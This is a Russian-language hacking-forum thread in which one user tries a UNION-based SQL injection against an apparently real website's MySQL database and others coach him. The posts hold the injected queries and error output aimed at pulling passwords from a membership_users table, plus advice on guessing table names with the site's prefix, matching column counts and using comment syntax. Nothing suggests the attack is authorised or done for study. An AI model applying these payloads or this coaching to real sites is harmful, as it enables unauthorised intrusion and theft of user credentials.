Нашол вот такую афигительную sql иньекцию: Code: [SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select null,null,null from admin] ( 1146 : Table 'igor987_studio.admin' doesn't exist ) Немогу таблицу с админкой прошупать, уже вариантов 20 попробывал, админка там точно есть с юзерами, у кого какие вварианты есть?
видишь префикс membership_ ? ну попробуй с ним че нить намутить. таблица admin - на самом деле маловероятно... попробуй просто user,users (с префиксом).
Блин нашол вот такая фигня вылазит Code: [SELECT failed in SQL: SELECT COUNT(*) FROM membership_categories WHERE parentid=2 union select null,null,password from membership_users AND enabled=1] ( 1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND enabled=1' at line 1 ) А после того как экранирую, такая [SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select null,null,password from membership_users*/] ( 1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '*/' at line 1 )
бля нахуя тебе тут что-то эранировать тем более неправильно? 1)у тебя кол-во столбцов из второго слеекта должно быть равно кол-ву столбцов из первого, то есть один 2)твои коментарии должны выглядить так Code: /*КАМЕНТЫ*/ или Code: /*КАМЕНТЫ с дальнейшими вопрjсами на mysql.ru
Code: [SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select 0 from membership_users/*] ( 1222 : The used SELECT statements have a different number of columns ) Блин вставляю одно поле, он показывает что с базы выгрибает три, ставлю три поля показывает, как я рание писал, что за фигня? подскажитес....
